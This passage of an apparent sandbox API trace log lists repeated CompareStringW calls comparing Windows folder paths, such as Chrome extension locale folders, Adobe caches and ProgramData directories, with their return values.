dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", cchCount1=72, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\", cchCount1=47, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 3 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\MF\\", cchCount1=32, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\", cchCount1=47, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount1=34, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 2 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount2=53) returned 2 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 2 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 2 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\", cchCount2=130) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\", cchCount2=130) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\", cchCount2=130) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\", cchCount2=130) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\", cchCount2=130) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\", cchCount2=130) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\", cchCount2=130) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\", cchCount2=130) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount1=59, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount2=84) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount2=84) returned 3 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount2=84) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount2=84) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount1=59, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 2 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount1=59, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount2=84) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount2=84) returned 2 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount1=59, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount2=118) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount2=118) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount2=118) returned 3 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount2=118) returned 3 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\", cchCount2=133) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\", cchCount2=133) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\", cchCount2=133) returned 3 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\", cchCount2=133) returned 3 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\", cchCount2=130) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\", cchCount2=130) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\", cchCount2=130) returned 3 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\", cchCount2=130) returned 3 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\", cchCount2=130) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\", cchCount2=130) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\", cchCount2=130) returned 3 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\", cchCount2=130) returned 3 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\", cchCount2=130) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\", cchCount2=130) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\", cchCount2=130) returned 3 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\", cchCount2=130) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\", cchCount2=130) returned 3 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount2=118) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount2=118) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount2=118) returned 3 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount2=118) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount2=118) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\", cchCount2=130) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\", cchCount2=130) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\", cchCount2=130) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\", cchCount2=130) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\", cchCount2=130) returned 1 [0271.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount1=34, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 2 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\", cchCount2=57) returned 3 [0271.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 